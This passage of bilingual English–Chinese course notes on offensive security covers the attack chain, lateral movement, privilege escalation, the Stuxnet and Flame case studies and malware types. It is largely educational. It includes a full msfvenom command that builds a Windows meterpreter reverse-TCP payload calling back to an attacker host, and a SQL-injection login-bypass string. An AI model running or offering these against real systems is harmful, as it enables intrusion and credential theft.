Mobile malware goals / 移动恶意软件目标：
- Send premium messages to generate revenue / 发送付费短信为黑客创收
- Steal personal information / 窃取个人信息
Smartphones vulnerable to scripting attacks and man-in-the-middle attacks via browsers/web apps. 智能手机通过浏览器/网络应用易受脚本攻击和中间人攻击。
Example: BlueBorne (September 2017) — Bluetooth-based attack. 示例：BlueBorne（2017年9月） — 基于蓝牙的攻击。

5.6 Hacking Every Device / 攻击所有设备

Target non-obvious devices in corporate networks (e.g., printers). 攻击企业网络中不起眼的设备（如打印机）。
Modern printers have inbuilt memory and only basic security → can reveal: 现代打印机有内置内存且安全性基本 → 可暴露：
- Password authentication mechanisms / 密码认证机制
- Sensitive data sent to print / 发送打印的敏感数据
- Entry points into secure networks / 进入安全网络的入口
"Weeping Angel" (WikiLeaks): Exploited Samsung smart TV's always-on voice system to record and transmit conversations to a CIA server. "哭泣天使"（维基解密）： 利用三星智能电视常开语音系统录制对话并传输至CIA服务器。

5.7 Hacking the Cloud / 攻击云端

Main vulnerability: Everything (storage, CPU, network) is shared in the cloud. 主要漏洞： 云端的一切（存储、CPU、网络）都是共享的。

Security largely left to the cloud vendor; individual company's security control is limited. 安全性主要由云服务商负责；各公司的安全控制有限。
Hackers typically compromise a user or system within the organization first, then access cloud data. 黑客通常先攻破组织内部的用户或系统，再访问云端数据。

Notable cloud-related attacks / 典型云端相关攻击：

Case / 案例	Details / 详情
Target	Up to 70 million credit card details stolen; started from a phishing email. 多达7000万信用卡信息被盗；始于一封钓鱼邮件。
Home Depot	56 million credit cards + 50 million emails compromised via point-of-sale cloud malware. 通过POS云系统恶意软件盗取5600万张信用卡和5000万封邮件信息。
Sony Pictures	Employee info, financial details, sensitive emails, and unreleased films stolen from cloud servers. 从云服务器窃取员工信息、财务数据、敏感邮件及未发布影片。
US IRS	100,000+ account details stolen from cloud server. 超过10万个账户信息从云服务器被盗。

Day 2-1 — Compromising the System (2) / 攻破系统（二）

1. Steps to Compromise / 攻破系统的步骤

The standard attack chain follows these phases: 标准攻击链遵循以下阶段：

Reconnaissance — gather information about the target / 侦察 — 收集目标信息
Weaponization — create exploit + payload / 武器化 — 创建漏洞利用程序和有效载荷
Delivery — deliver the weapon to target / 投递 — 将武器送达目标
Exploitation — trigger the vulnerability / 利用 — 触发漏洞
Installation — install malware/backdoor / 安装 — 安装恶意软件/后门
Command & Control (C2) — establish remote control / 命令与控制 — 建立远程控制
Actions on Objectives — exfiltrate, destroy, persist / 执行目标 — 窃取数据、破坏或持久化

2. Deploying Payloads / 部署有效载荷

2.1 Metasploit Framework / Metasploit 框架

Metasploit is the most widely used penetration testing framework. Metasploit 是最广泛使用的渗透测试框架。
Contains hundreds of exploits and payloads. 包含数百个漏洞利用程序和有效载荷。

Key tools / 主要工具：

Tool / 工具	Purpose / 用途
`msfconsole`	Interactive console for Metasploit / Metasploit的交互式控制台
`msfvenom`	Generate standalone payloads / 生成独立的有效载荷
Reverse TCP stager	Payload that calls back to attacker's machine / 回连攻击者机器的有效载荷

Reverse TCP Stager workflow / 反向TCP暂存器工作流程：

Attacker sets up listener (multi/handler) / 攻击者设置监听器
Payload delivered to victim / 有效载荷投递到受害者
Victim connects back to attacker / 受害者回连攻击者
Attacker gains shell/Meterpreter session / 攻击者获得shell/Meterpreter会话

Common msfvenom command / 常用命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload.exe

3. Zero-Day Vulnerabilities / 零日漏洞

Definition: A vulnerability unknown to the vendor; no patch exists yet. 定义： 厂商尚未知晓的漏洞；目前尚无补丁。

How zero-days are found / 如何发现零日漏洞：

Method / 方法	Description / 描述
Fuzzing / 模糊测试	Feed random/unexpected input to software to trigger crashes. 向软件输入随机/意外数据以触发崩溃。
Source code analysis / 源代码分析	Tools like Checkmarx scan code for vulnerabilities. 使用Checkmarx等工具扫描代码中的漏洞。
Reverse engineering / 逆向工程	Tools like IDA PRO disassemble binaries to find flaws. 使用IDA PRO等工具反汇编二进制文件以发现缺陷。

Zero-days are sold on the dark web — prices can reach millions of dollars. 零日漏洞在暗网上出售——价格可达数百万美元。
Bug bounty programs offer legal alternatives for researchers. 漏洞赏金计划为研究人员提供了合法的替代渠道。

4. Compromising the OS / 攻破操作系统

4.1 Buffer Overflow / 缓冲区溢出

Input data exceeds allocated buffer, overwriting adjacent memory (return address, pointers). 输入数据超出分配的缓冲区，覆盖相邻内存（返回地址、指针）。
Attacker can redirect execution to shellcode. 攻击者可以将执行流重定向到shellcode。
Structured Exception Handler (SEH) overwrite: A Windows-specific technique that overwrites the SEH chain to hijack execution. 结构化异常处理程序（SEH）覆盖： 一种Windows专有技术，通过覆盖SEH链来劫持执行流。

4.2 Insider Threats / 内部威胁

Threats from employees, contractors, or business partners with legitimate access. 来自拥有合法访问权限的员工、承包商或商业伙伴的威胁。
Hard to detect because insiders know the environment and bypass normal controls. 难以检测，因为内部人员了解环境并能绕过常规控制。

4.3 Linux Live CD Attack / Linux Live CD 攻击

Boot from a Linux Live CD/USB to bypass Windows login and access the file system directly. 从Linux Live CD/USB启动，绕过Windows登录并直接访问文件系统。
No authentication required — full disk access. 无需身份验证——完全磁盘访问。

4.4 Preinstalled Application Compromise / 预装应用程序攻击

Replace accessibility tools (e.g., magnify.exe, sticky keys) at the Windows login screen. 替换Windows登录界面上的辅助功能工具（如magnify.exe、粘滞键）。
Attacker triggers the replaced tool to get a SYSTEM-level command prompt before login. 攻击者触发替换后的工具，在登录前获得SYSTEM级命令提示符。

5. Compromising the Web / 攻破Web应用

5.1 SQL Injection (SQLi) / SQL注入

Attacker inserts malicious SQL code into input fields to manipulate the database. 攻击者在输入字段中插入恶意SQL代码以操纵数据库。
Can read, modify, or delete database content; bypass authentication. 可以读取、修改或删除数据库内容；绕过身份验证。

Example / 示例：

' OR '1'='1   -- always true, bypasses login

5.2 Cross-Site Scripting (XSS) / 跨站脚本攻击

Attacker injects malicious JavaScript into a web page viewed by other users. 攻击者在其他用户浏览的网页中注入恶意JavaScript。
Stored XSS: Script saved in the server's database; executes when other users view the page. 存储型XSS： 脚本保存在服务器数据库中；其他用户浏览页面时执行。
Can steal session cookies, redirect users, or perform actions on their behalf. 可以窃取会话Cookie、重定向用户或代表用户执行操作。

5.3 Broken Authentication / 身份验证缺陷

Weak or improperly implemented authentication allows attackers to compromise passwords, keys, or session tokens. 弱身份验证或实现不当允许攻击者破解密码、密钥或会话令牌。
Examples: credential stuffing, session fixation, weak password policies. 示例：凭据填充、会话固定、弱密码策略。

5.4 DDoS via Botnets / 通过僵尸网络进行DDoS攻击

Botnet: Network of compromised machines (bots) controlled by an attacker. 僵尸网络： 由攻击者控制的受感染机器（机器人）网络。
Used to launch Distributed Denial of Service (DDoS) attacks, overwhelming target servers. 用于发动**分布式拒绝服务（DDoS）**攻击，使目标服务器不堪重负。

6. IoT Case Study — Verizon 2017 / 物联网案例研究

Attack: University's IoT devices (vending machines, smart lights) compromised and used to attack the internal DNS server via DDoS. 攻击： 大学的物联网设备（自动售货机、智能灯）被攻破，用于通过DDoS攻击内部DNS服务器。

Source: Verizon 2017 Data Breach Digest 来源：Verizon 2017年数据泄露摘要
~5,000 IoT devices connected to the network; all infected. 约5,000台物联网设备接入网络；全部被感染。
DNS server overwhelmed → network disruption for the entire campus. DNS服务器被淹没 → 整个校园网络中断。
Lesson: IoT devices are often unsecured and become easy attack vectors. 教训： 物联网设备通常缺乏安全保护，成为容易利用的攻击向量。

7. Chasing the User's Identity / 追踪用户身份

Identity is the new perimeter / 身份是新的边界

Traditional perimeter (firewall, DMZ) is no longer sufficient. 传统边界（防火墙、DMZ）已不再足够。
Attackers target user credentials to move laterally and access resources. 攻击者以用户凭据为目标，进行横向移动并访问资源。
SSO (Single Sign-On) means one compromised credential gives access to everything. **单点登录（SSO）**意味着一个被盗凭据可以访问所有资源。

8. Hash Functions / 哈希函数

Purpose: Convert data of any size into a fixed-length digest; used for password storage and integrity verification. 目的： 将任意大小的数据转换为固定长度的摘要；用于密码存储和完整性验证。

Algorithm / 算法	Output Size / 输出长度
MD5	128-bit
SHA-1	160-bit
SHA-2 (SHA-224/256/384/512)	224 / 256 / 384 / 512-bit
SHA-3	224 / 256 / 384 / 512-bit

Hashes are one-way — cannot be reversed directly. 哈希是单向的——不能直接逆向。
Attackers use rainbow tables or brute force to crack hashes. 攻击者使用彩虹表或暴力破解来破解哈希。
MD5 and SHA-1 are considered broken — collision attacks possible. MD5和SHA-1被认为已被破解——可能发生碰撞攻击。

9. NTLM Authentication / NTLM 身份验证

NTLM = NT LAN Manager — Windows challenge/response authentication protocol. NTLM = NT LAN Manager — Windows挑战/响应身份验证协议。

Challenge/Response flow / 挑战/响应流程：

Client requests access / 客户端请求访问
Server sends challenge (nonce) / 服务器发送挑战（随机数）
Client hashes password + challenge and sends response / 客户端对密码+挑战进行哈希并发送响应
Server verifies the response / 服务器验证响应

The hash (not plaintext password) is sent over the network — but the hash itself is valuable. 网络上传送的是哈希（而非明文密码）——但哈希本身就很有价值。

10. SMB Relay Attack / SMB 中继攻击

Exploits NTLM authentication over SMB (Server Message Block). 利用SMB（服务器消息块）上的NTLM身份验证。
Attacker intercepts NTLM challenge/response and relays it to another server. 攻击者拦截NTLM挑战/响应并将其中继到另一台服务器。
Does not require cracking the password — just replays the captured authentication. 不需要破解密码——只需重放捕获的身份验证。
Mitigated by SMB signing (ensures messages are authenticated). 通过SMB签名（确保消息经过身份验证）来缓解。

11. MFA Failure — SIM Swap Attack / MFA失效 — SIM卡交换攻击

Attacker social engineers a mobile carrier to transfer the victim's phone number to a new SIM. 攻击者对移动运营商进行社会工程学攻击，将受害者的电话号码转移到新SIM卡上。
Attacker receives all SMS messages, including MFA codes. 攻击者接收所有短信，包括MFA验证码。
Bypasses SMS-based two-factor authentication completely. 完全绕过基于短信的双因素身份验证。
Defense: Use authenticator apps or hardware tokens instead of SMS MFA. 防御： 使用身份验证器应用或硬件令牌代替短信MFA。

12. Strategies for Identity Compromise / 身份攻破策略

12.1 Harvesting Credentials / 凭据收割

Method / 方法	Description / 描述
Unpatched vulnerabilities	Exploit known CVEs (e.g., CVE-2017-8563) to extract credentials. 利用已知CVE（如CVE-2017-8563）提取凭据。
Pass-the-Hash	Use captured NTLM hash directly without cracking. Tools: Mimikatz, Sysinternals. 直接使用捕获的NTLM哈希而无需破解。工具：Mimikatz、Sysinternals。
Brute Force	Systematically try all password combinations. 系统地尝试所有密码组合。
Social Engineering Toolkit (SET)	Automate phishing and credential harvesting attacks. 自动化钓鱼和凭据收割攻击。

12.2 Lateral Movement with Stolen Credentials / 利用盗取凭据进行横向移动

Once credentials are harvested, attackers use them to move laterally within the organization. 一旦凭据被收割，攻击者就用它们在组织内部进行横向移动。
This process can take months — attackers are patient and stealthy. 这个过程可能需要数月——攻击者耐心且隐秘。

Day 2-2 — Lateral Movement & Privilege Escalation / 横向移动与权限提升

1. Lateral Movement Overview / 横向移动概述

Definition: Movement within a compromised network to expand access and reach high-value targets. 定义： 在已攻破的网络内移动，以扩大访问权限并到达高价值目标。

Takes place inside the network — after initial compromise. 发生在网络内部——初始攻破之后。
Goal: find domain admin credentials, sensitive data, or critical systems. 目标：找到域管理员凭据、敏感数据或关键系统。
Can take weeks to months before attackers reach their ultimate target. 攻击者到达最终目标前可能需要数周到数月。

2. Internal Reconnaissance / 内部侦察

After gaining initial access, attackers perform internal recon to understand the network: 获得初始访问权限后，攻击者进行内部侦察以了解网络：

Identify active hosts, open ports, running services. 识别活跃主机、开放端口、运行服务。
Map the Active Directory structure (users, groups, OUs, GPOs). 绘制Active Directory结构（用户、组、OU、GPO）。
Find high-value targets: domain controllers, file servers, databases. 找到高价值目标：域控制器、文件服务器、数据库。

3. Scanning Tools / 扫描工具

3.1 Nmap / 网络映射工具

Nmap = Network Mapper — the industry-standard port scanner. Nmap = 网络映射器 — 行业标准端口扫描器。

Common Nmap options / 常用选项：

Flag / 标志	Function / 功能
`-sS`	TCP SYN (stealth) scan / TCP SYN（隐身）扫描
`-sV`	Service/version detection / 服务/版本检测
`-O`	OS detection / 操作系统检测
`-A`	Aggressive scan (OS + version + scripts + traceroute) / 激进扫描
`-p-`	Scan all 65535 ports / 扫描全部65535个端口
`-T4`	Faster timing / 更快的时序
`--script`	Run NSE scripts / 运行NSE脚本

Nmap Script Engine (NSE) Categories / Nmap脚本引擎分类：

Category / 类别	Description / 描述
`auth`	Authentication bypass checks / 身份验证绕过检查
`broadcast`	Network service discovery / 网络服务发现
`brute`	Brute-force credential attacks / 暴力破解凭据
`discovery`	Gather more info about the network / 收集更多网络信息
`dos`	Denial-of-service attacks / 拒绝服务攻击
`exploit`	Exploit known vulnerabilities / 利用已知漏洞
`fuzzer`	Send unexpected data to find vulnerabilities / 发送意外数据以发现漏洞
`intrusive`	Tests that may disrupt the target / 可能干扰目标的测试
`malware`	Detect malware backdoors / 检测恶意软件后门
`safe`	Non-disruptive tests / 不干扰的测试
`vuln`	Vulnerability detection / 漏洞检测

3.2 Nessus / Nessus漏洞扫描器

Nessus is a comprehensive vulnerability scanner — identifies vulnerabilities, misconfigurations, and compliance issues. Nessus 是一款全面的漏洞扫描器——识别漏洞、错误配置和合规问题。
Provides CVSS scores and remediation recommendations. 提供CVSS评分和修复建议。
More thorough than Nmap but also more detectable. 比Nmap更全面，但也更容易被检测到。

4. Avoiding Alerts / 避免触发警报

Attackers try to remain stealthy to avoid detection by: 攻击者尽量保持隐秘，通过以下方式避免被检测：

Network Intrusion Detection Systems (NIDS) — monitor network traffic for suspicious patterns. 网络入侵检测系统（NIDS）——监控网络流量中的可疑模式。
Host-based IDS — monitor individual hosts for suspicious activity. 基于主机的IDS——监控单个主机的可疑活动。

Evasion techniques / 规避技术：

Use legitimate tools already present on the system (Living off the Land / LotL). 使用系统上已有的合法工具（离地攻击）。
Slow down scanning to avoid triggering rate-based alerts. 减慢扫描速度以避免触发基于速率的警报。
Blend traffic into normal network patterns. 将流量混入正常网络模式。

5. Performing Lateral Movement / 执行横向移动

5.1 Sysinternals Suite / Sysinternals套件

Microsoft's Sysinternals tools (PsExec, PsLogList, etc.) are legitimate admin tools. 微软的Sysinternals工具（PsExec、PsLogList等）是合法的管理工具。
Attackers abuse them because they don't trigger AV and are whitelisted. 攻击者滥用它们是因为它们不触发杀毒软件且在白名单中。
PsExec: Execute processes remotely / 远程执行进程

Access SMB shares (Windows file shares) using stolen credentials. 使用盗取的凭据访问SMB共享（Windows文件共享）。
Used to drop tools, exfiltrate data, or spread malware. 用于投放工具、窃取数据或传播恶意软件。

5.3 Remote Desktop Protocol (RDP) / 远程桌面协议

Use RDP with stolen credentials to log into remote machines interactively. 使用盗取的凭据通过RDP以交互方式登录远程机器。
Gives full GUI access — easy to use, but also highly visible in logs. 提供完整的图形界面访问——易于使用，但在日志中非常明显。
Attackers often enable RDP if disabled, or pivot through existing sessions. 攻击者通常在RDP被禁用时启用它，或通过现有会话进行跳转。

5.4 PowerShell / PowerShell攻击

PowerShell is extremely powerful for lateral movement due to deep Windows integration. PowerShell因与Windows深度集成，对横向移动极为强大。
Common frameworks / 常用框架：
- PowerSploit — collection of PowerShell attack modules / PowerShell攻击模块集合
- Nishang — PowerShell scripts for pentest and red teaming / 用于渗透测试和红队的PowerShell脚本
Can download and execute payloads entirely in-memory (fileless). 可以完全在内存中下载和执行有效载荷（无文件攻击）。

5.5 WMI (Windows Management Instrumentation) / Windows管理规范

WMI allows remote execution of code on Windows machines. WMI允许在Windows机器上远程执行代码。
WMImplant — attack tool built on WMI for lateral movement. WMImplant — 基于WMI构建的横向移动攻击工具。
Very hard to detect — uses legitimate Windows channels. 极难检测——使用合法的Windows通道。

5.6 Scheduled Tasks / 计划任务

Create scheduled tasks on remote machines to execute malicious code at a later time. 在远程机器上创建计划任务以在稍后执行恶意代码。
Provides persistence and delayed execution to avoid immediate detection. 提供持久性和延迟执行以避免立即被检测。

5.7 Remote Registry / 远程注册表

Modify the Windows Registry on remote machines to install run keys (persistence) or change settings. 修改远程机器上的Windows注册表以安装运行键（持久性）或更改设置。
Requires admin privileges on the remote machine. 需要远程机器上的管理员权限。

5.8 Active Directory / Active Directory攻击

Active Directory (AD) is the central authentication and authorization system for Windows networks. **Active Directory（AD）**是Windows网络的中央身份验证和授权系统。
Attackers target AD to: 攻击者攻击AD以：
- Enumerate users, groups, computers / 枚举用户、组、计算机
- Find privileged accounts (Domain Admins) / 找到特权账户（域管理员）
- DCSync attack — impersonate a Domain Controller to replicate password hashes / DCSync攻击 — 模拟域控制器以复制密码哈希
- Golden Ticket — forge Kerberos tickets using KRBTGT hash for unlimited access / 黄金票据 — 使用KRBTGT哈希伪造Kerberos票据以获得无限访问

5.9 Other Lateral Movement Techniques / 其他横向移动技术

Technique / 技术	Description / 描述
Breached host analysis	Analyze a compromised host for stored credentials, SSH keys, config files. 分析已攻破主机上存储的凭据、SSH密钥、配置文件。
Central admin consoles	Compromise SCCM, WSUS, or other management tools to push malware to all managed endpoints. 攻破SCCM、WSUS或其他管理工具，向所有受管端点推送恶意软件。
Email pillaging	Search mailboxes for passwords, sensitive documents, credentials in emails. 搜索邮箱中的密码、敏感文档、邮件中的凭据。

6. Privilege Escalation / 权限提升

Definition: Gaining higher privileges than initially obtained. 定义： 获得比最初获得的更高权限。

Principle of least privilege: Users/processes should have only the minimum privileges needed. 最小权限原则： 用户/进程应只拥有所需的最小权限。
Attackers try to escalate from user → admin → SYSTEM/root. 攻击者尝试从普通用户 → 管理员 → SYSTEM/root进行提升。

6.1 Horizontal Privilege Escalation / 水平权限提升

Definition: Gain access to another user's account at the same privilege level. 定义： 获得同一权限级别的另一个用户账户的访问权限。

Methods / 方法：

Software bugs — exploit vulnerabilities to access another user's session / 利用漏洞访问另一用户的会话
Creating admin accounts — add new admin user via misconfiguration / 通过错误配置添加新管理员用户
Session/cookie theft — steal authentication tokens / 窃取身份验证令牌
XSS — steal session cookies via cross-site scripting / 通过跨站脚本窃取会话Cookie
Weak passwords — guess or brute-force another user's password / 猜测或暴力破解另一用户的密码
Keylogging — capture another user's keystrokes / 捕获另一用户的击键

6.2 Vertical Privilege Escalation / 垂直权限提升

Definition: Gain higher privileges (e.g., user → admin → SYSTEM). 定义： 获得更高权限（例如，普通用户 → 管理员 → SYSTEM）。

More difficult than horizontal, but more rewarding. 比水平提权更难，但回报更大。
Platform examples: 平台示例：
- Windows: buffer overflows targeting SYSTEM processes / 针对SYSTEM进程的缓冲区溢出
- Mac: jailbreaking techniques / 越狱技术

6.3 Vertical Privilege Escalation Methods / 垂直权限提升方法

Method 1: Valid Admin Accounts / 有效的管理员账户

Use already-compromised admin credentials (from credential harvesting). 使用已经被盗的管理员凭据（来自凭据收割）。
Simplest method — no exploitation needed if creds are available. 最简单的方法——如果凭据可用则无需漏洞利用。

Method 2: Access Token Manipulation / 访问令牌操控

In Windows, every process runs under an access token defining its privileges. 在Windows中，每个进程在定义其权限的访问令牌下运行。
Attacker can impersonate a higher-privileged token (e.g., "Run as Administrator"). 攻击者可以模拟更高权限的令牌（例如"以管理员身份运行"）。
Tools: token impersonation modules in Metasploit/Cobalt Strike. 工具：Metasploit/Cobalt Strike中的令牌模拟模块。

Method 3: Application Shimming / 应用程序垫片

Application Compatibility Shims — Microsoft mechanism to fix compatibility issues for older apps. 应用程序兼容性垫片 — 微软用于修复旧应用程序兼容性问题的机制。
Attackers create custom shims that redirect API calls or bypass UAC. 攻击者创建自定义垫片，重定向API调用或绕过UAC。
Malicious shim persists in registry — runs every time the targeted application launches. 恶意垫片持久存储在注册表中——每次目标应用程序启动时运行。

Method 4: Bypassing UAC / 绕过UAC

UAC = User Account Control — Windows mechanism to prevent unauthorized changes. UAC = 用户账户控制 — 防止未经授权更改的Windows机制。

Bypass techniques / 绕过技术：
- rundll32.exe — abuse to execute code with elevated privileges / 滥用以提升权限执行代码
- netplwiz.exe — Windows user account management tool abuse / 滥用Windows用户账户管理工具
These are LOLBins (Living Off the Land Binaries) — legitimate Windows binaries abused. 这些是LOLBins（离地二进制文件）——被滥用的合法Windows二进制文件。

Method 5: DLL Injection / DLL注入

DLL = Dynamic Link Library — shared libraries loaded by processes at runtime. DLL = 动态链接库 — 进程在运行时加载的共享库。

DLL Injection steps / DLL注入步骤：

Attach to target process / 附加到目标进程
Access the process's memory space / 访问进程的内存空间
Copy malicious DLL into the process / 将恶意DLL复制到进程中
Execute the DLL within the process context / 在进程上下文中执行DLL

Malware using DLL injection / 使用DLL注入的恶意软件：

Backdoor.Oldrea — industrial espionage tool / 工业间谍工具
BlackEnergy — targeted power grids / 针对电网
Duqu — cyber espionage framework / 网络间谍框架

Method 6: Reflective DLL Injection / 反射式DLL注入

Advanced variant of DLL injection. DLL注入的高级变体。
The malicious DLL loads itself into memory without touching the disk. 恶意DLL自行加载到内存中而不接触磁盘。
Bypasses Windows API monitoring — traditional DLL injection uses LoadLibrary() which is monitored; reflective injection does not. 绕过Windows API监控 — 传统DLL注入使用受监控的LoadLibrary()；反射式注入不使用。
Much harder to detect by endpoint security tools. 更难被端点安全工具检测。

Method 7: DLL Search Order Hijacking / DLL搜索顺序劫持

Windows searches for DLLs in a specific order (application directory → system directories → PATH). Windows按特定顺序搜索DLL（应用程序目录 → 系统目录 → PATH）。
Attacker places a malicious DLL with the same name in a directory searched before the legitimate one. 攻击者在比合法DLL更早搜索的目录中放置恶意DLL，名称相同。
Application loads the malicious DLL thinking it's legitimate. 应用程序加载恶意DLL，以为它是合法的。

7. Concluding the Mission / 完成任务

After achieving goals, attackers have three final options: 完成目标后，攻击者有三个最终选项：

Action / 行动	Description / 描述
Exfiltration / 数据窃取	Steal sensitive data (PII, IP, credentials) and transfer out of the network. 窃取敏感数据（个人信息、知识产权、凭据）并传输出网络。
Sustainment / 持久化	Maintain long-term access; install rootkits, create multiple access points (backdoors). 维持长期访问；安装rootkit，创建多个访问点（后门）。
Assault / 破坏	Cause permanent damage — delete data, disrupt services, sabotage industrial systems. 造成永久性损害 — 删除数据、中断服务、破坏工业系统。

8. Stuxnet — Case Study / Stuxnet 案例研究

Stuxnet is widely considered the world's first cyberweapon targeting physical infrastructure. Stuxnet 被广泛认为是首个针对物理基础设施的网络武器。

Key facts / 关键事实：

Size: ~500 KB worm 大小：约500 KB的蠕虫
Target: Iran's nuclear enrichment facilities (specifically Siemens PLCs controlling uranium centrifuges) 目标：伊朗核浓缩设施（专门针对控制铀离心机的西门子PLC）
First identified by VirusBlokAda in June 2010 2010年6月由VirusBlokAda首次识别
Believed to be developed by US and Israel (Operation Olympic Games) 据信由美国和以色列开发（奥运会行动）

Three-Phase Attack Structure / 三阶段攻击结构：

Phase / 阶段	Description / 描述
Phase 1: Windows Infection	Spread via USB drives using 4 zero-day exploits; infect Windows machines. 通过USB驱动器利用4个零日漏洞传播；感染Windows机器。
Phase 2: Seek Target	Search for machines running Siemens Step7 or WinCC software. 搜索运行西门子Step7或WinCC软件的机器。
Phase 3: Compromise PLCs	Reprogram Siemens S7-315 and S7-417 PLCs to damage centrifuges while reporting normal operation. 对西门子S7-315和S7-417 PLC重新编程，在报告正常运行的同时损坏离心机。

6-Step Operational Flow / 6步操作流程：

Infection — spreads via USB / 通过USB传播感染
Search — identify target systems / 识别目标系统
Update — update itself via peer-to-peer if needed / 必要时通过P2P自我更新
Compromise — inject malicious code into PLCs / 向PLC注入恶意代码
Control — take over centrifuge operation / 接管离心机操作
Deceive & Destroy — report fake normal readings while physically destroying centrifuges / 报告虚假的正常读数，同时物理损坏离心机

Significance / 重要意义：

First malware to physically destroy industrial equipment. 首个物理损毁工业设备的恶意软件。
Demonstrated that cyberattacks can cause real-world physical damage. 证明了网络攻击可以造成现实世界的物理损害。
Changed the nature of cyber warfare. 改变了网络战争的本质。

9. Flame — Case Study / Flame 案例研究

Flame (also known as Flamer or sKyWIper) is an advanced cyber-espionage toolkit. Flame（又名Flamer或sKyWIper）是一个先进的网络间谍工具包。

Key facts / 关键事实：

Size: ~20 MB — approximately 40× larger than Stuxnet 大小：约20 MB — 大约是Stuxnet的40倍
Purpose: Cybersurveillance (not destruction) — gather intelligence 目的：网络监控（非破坏）— 收集情报
Discovered: May 2012 by Kaspersky Lab 发现时间：2012年5月，由卡巴斯基实验室发现
Targets: Middle East (primarily Iran, but also Israel, Sudan, Syria, Lebanon) 目标：中东（主要是伊朗，但也包括以色列、苏丹、叙利亚、黎巴嫩）

Key capabilities / 主要功能：

Capability / 功能	Description / 描述
Bluetooth exfiltration	Steal data via Bluetooth from nearby devices (up to 2 km with a Bluetooth rifle). 通过蓝牙从附近设备窃取数据（使用蓝牙步枪最远2公里）。
Windows Update propagation	Spread via fake Windows 7 updates using a forged Microsoft certificate. 使用伪造的微软证书通过虚假Windows 7更新传播。
Screenshot capture	Periodically capture screen contents / 定期捕获屏幕内容
Keylogging	Record keystrokes / 记录击键
Audio recording	Activate microphone to record conversations / 激活麦克风录制对话
Small-chunk transmission	Transmit collected data in small pieces to avoid detection / 以小数据块传输收集的数据以避免检测

Comparison with Stuxnet / 与Stuxnet的比较：

	Stuxnet	Flame
Size / 大小	~500 KB	~20 MB
Purpose / 目的	Destruction / 破坏	Espionage / 间谍
Target / 目标	Industrial PLCs / 工业PLC	Computers & networks / 计算机和网络
Discovery / 发现	June 2010	May 2012
Complexity / 复杂性	High / 高	Extremely high / 极高

Day 3-1 — Malware and Attack Technologies / 恶意软件与攻击技术

1. What is Malware? / 什么是恶意软件？

Malware = Malicious Software — any program that performs malicious activities. 恶意软件（Malware） = 恶意软件 — 执行恶意活动的任何程序。

NIST SP 800-83 definition / NIST SP 800-83 定义：

"Malware is a program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of victim's data, applications or operating systems or otherwise annoying or disrupting the victim." "恶意软件是被（通常是秘密地）插入系统的程序，意图破坏受害者数据、应用程序或操作系统的机密性、完整性或可用性，或以其他方式骚扰或破坏受害者。"

Scale of the problem / 问题规模（2024年统计）：

Over 1 billion malware programs exist. 超过10亿种恶意软件程序存在。
560,000 new pieces detected every day. 每天检测到56万个新恶意软件。
Three in four infected IoT devices are routers. 四分之三的受感染物联网设备是路由器。
Symantec (2020): detected malware variants rose by 62%. Symantec（2020年）：检测到的恶意软件变体增加了62%。
Google: detects 50 websites containing malware every week. Google：每周检测到含恶意软件的网站50个。

Damage examples / 危害示例：

Trojans — introduce backdoor to government networks for classified information theft. 木马 — 向政府网络引入后门，用于窃取机密信息。
Ransomware — encrypts user data and demands payment for decryption key. 勒索软件 — 加密用户数据并要求付款以获得解密密钥。
Botnet malware — responsible for DDoS attacks, spam, and phishing. 僵尸网络恶意软件 — 负责DDoS攻击、垃圾邮件和网络钓鱼。

2. Malware Classification / 恶意软件分类

2.1 Types of Malware / 恶意软件类型

Type / 类型	Description / 描述
Virus / 病毒	Needs a host program; infects by modifying other programs. 需要宿主程序；通过修改其他程序来感染。
Worm / 蠕虫	Standalone; self-propagates across systems without a host. 独立存在；无需宿主即可跨系统自我传播。
Trojan / 木马	Appears legitimate but performs hidden malicious functions; does not self-replicate. 看似合法但执行隐藏的恶意功能；不自我复制。
Spyware / 间谍软件	Secretly collects user information. 秘密收集用户信息。
Botnet Malware / 僵尸网络恶意软件	Turns machines into bots controlled by an attacker for DDoS, spam, etc. 将机器变成由攻击者控制的机器人，用于DDoS、垃圾邮件等。
Ransomware / 勒索软件	Encrypts data; demands payment for decryption. 加密数据；要求付款才解密。

2.2 Classification Dimensions / 分类维度

Dimension / 维度	Categories / 类别
Host required? 需要宿主？	Viruses (need host) vs Worms & Bots (standalone) 病毒（需要宿主）vs 蠕虫和机器人（独立）
Self-replicating? 自我复制？	Viruses & Worms (replicate) vs Trojans & Spam (don't) 病毒和蠕虫（复制）vs 木马和垃圾邮件（不复制）
Payload action 有效载荷行动	Corruption of files vs Theft of service vs Theft of information 文件损坏 vs 服务窃取 vs 信息窃取

2.3 Potentially Unwanted Programs (PUPs) / 潜在有害程序

A PUP is code bundled with a useful program but performs unwanted actions. PUP是与有用程序捆绑但执行不需要的操作的代码。
Example: Adware in a free mobile game — displays ads AND collects geo-location, time spent, friends list without user consent. 示例：免费手机游戏中的广告软件 — 在未经用户同意的情况下显示广告并收集地理位置、游戏时间、好友列表。
Considered spyware — steals information about a computer and its users. 被视为间谍软件 — 窃取关于计算机及其用户的信息。
PUPs are in a grey area but should be classified as malware from a cybersecurity perspective. PUP处于灰色地带，但从网络安全角度应归类为恶意软件。

3. Virus / 计算机病毒

Definition: A piece of software that can "infect" other programs by modifying them; requires a host program or file to execute. 定义： 一种可以通过修改其他程序来"感染"它们的软件；需要宿主程序或文件才能执行。

First appeared in the early 1980s. 最早出现于1980年代初。
Tighter access controls on modern OS significantly hinder virus infection. 现代操作系统更严格的访问控制显著阻碍了病毒感染。
Led to macro viruses — exploit active content in documents (Word, Excel, PDF). 催生了宏病毒 — 利用文档（Word、Excel、PDF）中的活动内容。

3.1 Basic Components / 基本组成

Component / 组成	Description / 描述
Infection mechanism / 感染机制	How the virus spreads/propagates (also called infection vector). 病毒传播的方式（也称感染向量）。
Trigger / 触发器	Event or condition that activates the payload; also called a logic bomb. 激活有效载荷的事件或条件；也称为逻辑炸弹。
Payload / 有效载荷	What the virus does besides spreading — damage or noticeable activity. 病毒除传播外所做的事情——破坏或明显活动。

3.2 Lifecycle Phases / 生命周期阶段

Phase / 阶段	Description / 描述
Dormant / 休眠	Virus is idle; waiting for a trigger. Not all viruses have this phase. 病毒处于空闲状态；等待触发。并非所有病毒都有此阶段。
Propagation / 传播	Virus places a copy of itself into other programs or disk areas. 病毒将自身副本植入其他程序或磁盘区域。
Triggering / 触发	Virus is activated to perform its intended function. 病毒被激活以执行其预期功能。
